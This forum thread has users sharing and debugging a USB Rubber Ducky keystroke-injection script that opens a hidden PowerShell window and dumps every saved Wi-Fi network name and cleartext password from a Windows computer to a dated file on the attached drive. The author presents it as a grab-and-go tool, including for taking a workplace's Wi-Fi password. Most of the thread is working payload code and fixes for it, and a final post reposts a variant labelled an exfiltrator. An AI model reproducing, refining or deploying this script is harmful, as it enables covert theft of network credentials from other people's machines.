Jump to content

Help With Wifi Password Grabber


Recommended Posts

So I have been working on a script (admittedly for a while, this is my first script) to grab wifi names and passwords off computers and dump them to a text files. So fair I have it working great, it grabs every wireless Internet connection that the computer has ever made and it dumps it straight back to usb within seconds, to grab and go. I just need help with one thing... How to hide the powershell window and is there anyway of making this script better (I already know i can use powershell to sent txt files to servers or through email i just think its easier with such a simple script to dump it straight back to usb)?

Here is the Script

Quote

REM Name: Windows 10 Powershell WIFI Passwords Grabber
REM Auther: Braineater, Mad Props To Darren Kitchen For Volume Finder Script
DELAY 2000
GUI R
DELAY 200
STRING powershell
ENTER
DELAY 200
STRING $u=gwmi Win32_Volume|?{$_.Label -eq'@'}|select name;cd $u.name
ENTER
DELAY 100
STRING (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)}  | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize >WfiPasswords.txt
ENTER
DELAY 100
STRING exit
ENTER

 

Link to comment
Share on other sites

I'll try that thanks. But can you still interact with the window when it is hidden, ie hid attack?

 

Link to comment
Share on other sites

Thanks for the help. This is the final product that i have come up with and I'm super happy with it for my first script and Imy first go at powershell. I know there would be a way to shorten the powershell down, so if anyone comes up with anything please post it below. I also added a generated date stamp to the output txt file so you can save multiplet computers and days worth of extracted files. 

 

eg mate forgets his wifi password to give to you and you want the wifi password from work you can plug it in and save both automatically.

Quote

REM Name: Windows 10 Powershell WIFI Passwords Grabber
REM Auther: Braineater
REM Mad Props: Darren Kitchen for Volume Finder
DELAY 2000
GUI R
DELAY 200
STRING powershell -WindowStyle hidden
ENTER
DELAY 200
STRING $u=gwmi Win32_Volume|?{$_.Label -eq'@'}|select name;cd $u.name
ENTER
DELAY 100
STRING (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)}  | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize >WfiPasswords$(get-date -f yyyy-MM-dd).txt
ENTER
DELAY 100
STRING exit
ENTER

 

Link to comment
Share on other sites

Awesome thanks for the heads up I'll give it ago. I'm assuming that if it works on window 7 it's forwards and maybe backwards compatible? Not many changes have been made to powershell from what I can tell. I'll have to read up on Windows 7 powershell too. Thanksfor the tip.

Link to comment
Share on other sites

  • 2 weeks later...

when i try your script i got some error with this line

$u=gwmi Win32_Volume|?{$_.Label -eq'@'}|select name;cd $u.name

the error says

cd : Cannot process argument because the value of argument "path" is null. Change the value of argument "path" to a
non-null value.
At line:1 char:53
+ $u=gwmi Win32_Volume|?{$_.Label -eq'@'}|select name;cd $u.name
+                                                     ~~~~~~~~~~
    + CategoryInfo          : InvalidArgument: (:) [Set-Location], PSArgumentNullException
    + FullyQualifiedErrorId : ArgumentNull,Microsoft.PowerShell.Commands.SetLocationCommand

i don't know what's wrong.. i'm running win10pro, but the path got me error... can you tell me what's wrong?

Link to comment
Share on other sites

I can certainly try @index  Can I ask the name of the usb flash drive that you used (ie the name you have given to the drive) or what you named the mass storage of the twin duck that you used?

This code has to be used with the rubber ducky flash with the twin duck firmware or the standard duck (or arduino) with a second usb drive plugged in as well (as it needs somewhere to store the output file) . The way I have written the code (stolen it from Darren)  the usb or duck has to be named @ (just simply the at sign "@" and nothing else). You can of course change this just by changing the @ symbol in the code.

ie

$u=gwmi Win32_Volume|?{$_.Label -eq'your drive name here'}|select name;cd $u.name

It seems that the code powershell is throwing after running the command, that it can not find the drive name specified. 

Hopefully this helps and if not let me know and I can look into it more (currently not in front of my computer). 

Edited by BrainEater
Link to comment
Share on other sites

ohh yea. thanks. i'm just new with this syntax shell thing... i'm sorry.

so i fixed it but nothing saved. when i  debugging what just happen with some delay, i notice something change with the command in powershell

ducky type this code: 

$u=gwmi Win32_Volume|?{$_.Label -eq'anjing'}|select name;cd $u.name
PS D:\> (netsh wlan show profiles) | Select-String @\:(.+)$@ | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh
 wlan show profile name=@$name@ key=clear)}  | Select-String @Key Content\W+\:(.+)$@ | %{$pass=$_.Matches.Groups[1].Valu
e.Trim(); $_} | %{[PSCustomObject]"{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize >WfiPasswords$(get-da
te -f yyyy-MM-dd).txt

notice this quotation mark should be written with @ rigth? >  %{[PSCustomObject]"{ PROFILE_NAME=$name;PASSWORD=$pass }} 

i think something is wrong when i encode your script with ducktoolkit... how can i fix this?

Link to comment
Share on other sites

ok so i found the answer. i'm so sorry that i post a new post, i don't know why i can't edit my posted above.

i don't know it's my laptop error or my usbducky error, because it seems that my laptop read "quotation mark" as @ symbol and @ symbol as "quotation mark" when my ducky write into the powershell.... i have to replace @ with "quotation mark" and same with "quotation mark" i replace it with @ and re-encode it again then my problem is solved. do you ever experience this kind of error? 

Link to comment
Share on other sites

That's fine mate and don't be sorry I'm happy to help when I can I'm only new to all this as well. 

So the issue your having is really simple and it's not your computer or the script. If you are using the duck encoder on the website duckytoolbox it's an issue with the encoder. I have had the exact same problem when encoding anything more then a simple script. The easy fix is just to download the Java script encode (or the whole duck toolkit)from Darren's github page and encode it on your computer with that. It's upto date and from what I believe te website is no longer maintain. 

Link to comment
Share on other sites

@illwill WhIle I'm here I will thank you for your input, it's interesting to see how powershell has change over the year but at the core it's still the same today as it was when it first come out. They have just added a few little commands to make life easier. Your adjustments work great and worked on every version of powershell. I'll give you some mad props in my REM and from now on try to code at the most basic level of powershell because its upwards compatible. 

Edited by BrainEater
Link to comment
Share on other sites

  • 4 years later...
  • 1 year later...

I always get a error when i use it i changed the path but always get the path null error. My path is H

 

CODE:

REM usb rubber ducky wifi password exfiltrator
REM created by : C0SM0

REM let the computer recognize the twinduck
DELAY 1000

REM open powershell via runbox
GUI r
DELAY 200
STRING powershell
ENTER
DELAY 300

REM cd into twinduck labled "H"
STRING $u=gwmi Win32_Volume|?{$_.Label -eq'H'}|select name;cd $u.name
ENTER
DELAY 100

REM exfiltate wifi passwords to a file
REM file named after the computer name
STRING (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)}  | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize >$env:UserName".txt"; exit
ENTER

 

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...